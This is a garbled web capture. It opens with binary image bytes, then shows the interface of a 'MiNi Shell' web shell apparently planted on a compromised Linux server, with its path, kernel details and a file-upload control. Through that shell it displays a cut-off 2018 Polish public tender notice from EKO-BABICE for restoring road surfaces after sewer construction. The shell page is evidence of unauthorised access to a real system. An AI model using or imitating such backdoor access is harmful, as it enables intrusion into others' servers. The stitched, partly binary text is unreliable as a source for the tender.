JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180806/599938-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 599938-N-2018 z dnia 2018-08-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gminne Przedsiębiorstwo Komunalne EKO-BABICE Spółka z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odtworzenie nawierzchni po wykonaniu kanalizacji sanitarnej zadań pn. ,,Budowa sieci kanalizacji sanitarnej - ul. Dzikiej Róży, Kwiatów Polnych, Zielonej Łąki, Lasku Brzozowego, Lawendy w Borzęcinie Małym"; Budowa sieci kanalizacji sanitarnej w miejscowości Zielonki Wieś pomiędzy ulicami Sportową i Białej Góry".</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Program Operacyjny Infrastruktura i Środowisko 2014-2020, Oś Priorytetowa II, działanie 2.3 - Gospodarka wodno-ściekowa w aglomeracjach</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gminne Przedsiębiorstwo Komunalne EKO-BABICE Spółka z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1602680800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kutrzeby</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">36</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05082 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stare Babice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">022 7229008, 7529253</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">jasinski@eko-babice.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">022 7229008, 7529253</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.eko-babice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.eko-babice.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.eko-babice.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego, osobiście, lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gminne Przedsiębiorstwo Komunalne ,,EKO-BABICE" Sp. z o.o., ul. Gen. Kutrzeby 36, 05-082 Stare Babice, pok. nr 14 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odtworzenie nawierzchni po wykonaniu kanalizacji sanitarnej zadań pn. ,,Budowa sieci kanalizacji sanitarnej - ul. Dzikiej Róży, Kwiatów Polnych, Zielonej Łąki, Lasku Brzozowego, Lawendy w Borzęcinie Małym"; Budowa sieci kanalizacji sanitarnej w miejscowości Zielonki Wieś pomiędzy ulicami Sportową i Białej Góry".</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">JRP / PR / 12 / 8 / 2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia są roboty budowlane polegające na odtworzeniu dróggminnych nieutwardzonych w miejscowości Zielonki Wieś i Borzęcin Mały kruszywem dostarczonymprzez Wykonawcę. 1) W ramach zamówienia należy dostarczyć kruszywo i odtworzyć nawierzchniedróg oraz trawników przylegających do dróg. Dla odcinków dróg gruntowych i z kruszywa łamanegonależy wykonać profilowanie (oraz wyrównanie) z zagęszczeniem istniejącego materiału orazwbudować nową warstwę z kruszywa łamanego grubości 10 cm, wyprofilować ze spadkiemdaszkowym dwustronnym 6% i szerokości zgodnej z pkt 2 oraz zagęścić wbudowane kruszywo. Ośjezdni powinna pokrywać się z osią pasa drogowego, zaś łuki na skrzyżowaniach należy wykonać opromieniu 5,0 m. Zniszczoną zieleń i pobocza gruntowe należy oczyścić i wyprofilować (pochylenie6-10 %) tak, aby najniższe ich miejsce znajdowało się w środku ich szerokości w celu zebrania wodyopadowej z nawierzchni oraz przyległego terenu oraz wykonać humusowanie (śr. 4 cm i min. 3 cmgrubości) z obsiewem trawą. Szerokości trawników zgodne z podanymi pkt 2. Do niwelety drógdopasować zjazdy oraz dokonać ich regulacji. 2) Dla odcinków sieci i przyłączy zlokalizowanych pozajezdnią (pasem ruchu) należy odtworzyć trawniki poprzez odpowiednie wyprofilowanie terenu, tak bynastępował spływ wody opadowej poza jezdnię oraz wykonanie humusowania (śr. 4 cm i min.gr. 3 cm)i obsiew trawą. 3) Zakres poszczególnych odcinków do odtworzeń będzie każdorazowo uzgodnionyprzy udziale Zamawiającego, Inspektora Nadzoru i Wykonawcy. 4) UWAGA! Dostarczane kruszywołamane musi być w kolorze szarym! Zamawiający nie dopuszcza stosowania kruszywa w innym niżwymieniony wyżej kolor. Kruszywo po wbudowaniu nie może powodować pylenia, brudzeniapojazdów, innych zabrudzeń trudno usuwalnych oraz przenoszenia drobnych części np. na kołachpojazdów itp. 5) Dostarczane kruszywo drogowe - kliniec łamany o frakcji 4 - 31,5 mm musiodpowiadać normie PN-EN 13242+A1:2010 Kruszywa do niezwiązanych i związanych hydrauliczniemateriałów stosowanych w obiektach budowlanych i budownictwie drogowym . Dostawca do każdejdostarczonej partii kruszywa powinien dołączyć deklarację właściwości użytkowych wyrobu z w/wdokumentem. 6) Zamawiający wyklucza zastosowanie klinca wapiennego. 7) W przypadkustwierdzenia przez Zamawiającego wad związanych z dostawą kruszywa (tj. materiał nie zgodny zwymogami SIWZ, w szczególności nieodpowiedni kolor kruszywa łamanego, zbyt duża zawartośćdrobnych frakcji w kruszywie łamanym, elementy organiczne, szklane lub stalowe w kruszywiebetonowym i inne wymienione w umowie i SIWZ), Wykonawca zobowiązuje się do jego usunięcia wtrybie pilnym we własnym zakresie i na własny koszt oraz dostarczenie nowego kruszywa zgodnego zwymaganiami SIWZ i jego wbudowania w remontowany odcinek drogi również na własny koszt. 8)Do wykonania zamówienia Wykonawca powinien użyć odpowiednich pojazdów, zapewniającychdobrą, jakość wykonanych dostaw oraz bezpieczeństwo ich wykonywania. 9) Pojazdy dostarczającekruszywo oraz sprzęt samojezdny (koparki, równiarki, walce itp.) muszą być prawidłowo oznakowaneoraz muszą być wyposażone w ostrzegawczy sygnał świetlny błyskowy barwy żółtej, widoczny zewszystkich stron z dużej odległości działający w trakcie przebywania pojazdów na ternie robót.Wykonawca ponosi pełną odpowiedzialność za utrzymanie oznakowania pojazdów i zapewnieniebezpieczeństwa użytkowników dróg w trakcie dostarczania kruszywa. 10) Regulacja włazów iurządzeń wodociągowo-kanalizacyjnych w drogach po stronie Zamawiającego. 11) W przypadkuzniszczenia urządzeń infrastruktury technicznej w trakcie dostawy kruszywa Wykonawca jestzobowiązany natychmiast powiadomić w sposób skuteczny właściciela urządzenia o jego uszkodzeniuoraz ponieść wszelkie koszty związane z jego naprawą. W przypadku, gdy Wykonawca nie podejmiedziałań, w celu załatwienia w/w sprawy wówczas Zamawiający pokryje koszty zgłoszonegoroszczenia i potrąci Wykonawcy z następnej faktury za wykonane prace. Wykonawca wyraża na topotrącenie zgodę. 2. Szacowany zakres do odtworzenia dróg w poszczególnych miejscowościachzawarty jest w SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45220000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzieleniezamówień, o których mowa w art. 67 ust. 1 pkt 6 Pzp, w wysokości nie większej niż 50% wartościzamówienia podstawowego i polegających na powtórzeniu podobnych robót budowlanych zgodnych zprzedmiotem zamówienia. Na okoliczność wystąpienia przedmiotowych zamówień zostanie zawartaumowa w trybie zamówienia z wolnej ręki poprzedzona stosownymi negocjacjami z Wykonawcą.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">70</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający wymaga wpisu do właściwego rejestru zawodowego lubhandlowego zgodnie z wymogami określonymi w SIWZ</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">1. Wykonawca spełni warunek, jeżeli wykaże, że: a) posiada minimalnyroczny obrót za ostatnie 3 lata obrotowe w wysokości nie mniejszej niż 200 000 zł za każdy rokobrotowy, a jeżeli okres prowadzenia działalności jest krótszy, za ten okres. b) posiada środkifinansowe lub zdolność kredytową do wykonania zamówienia w wysokości nie mniejszej niż 100000,00 zł; c) posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonejdziałalności w wysokości nie mniejszej niż 100 000,00 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">1. Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lubekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 2. Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja", o którejmowa w pkt 10.5. SIWZ wystąpi wyłącznie w przypadku kiedy: 1) Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobówna potrzeby realizacji zamówienia. 2) Zamawiający oceni, czy udostępniane wykonawcy przez innepodmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu orazzbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24ust. 1 pkt 13-22 Pzp oraz, o których mowa w pkt 11.1. SIWZ. 3) W odniesieniu do warunkówdotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogąpolegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lubusługi, do realizacji których te zdolności są wymagane. 3. Wykonawca, który polega na sytuacjifinansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, któryzobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałąwskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 4.Zamawiający informuje, iż szczegółowe wymagania odnośnie niniejszych warunków zawarte są wspecyfikacji istotnych warunków zamówienia zamieszczonej na stronie internetowejZamawiającego.</span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykonawca spełni warunek, jeżeli wykaże, że: a) wykonał zgodnie zzasadami prawa budowlanego i prawidłowo ukończył, w okresie ostatnich 5 lat przed upływemterminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie conajmniej dwa zamówienia (realizowane w ramach dwóch odrębnych umów) polegające naodtworzeniu lub budowie lub naprawie dróg nieutwardzonych lub 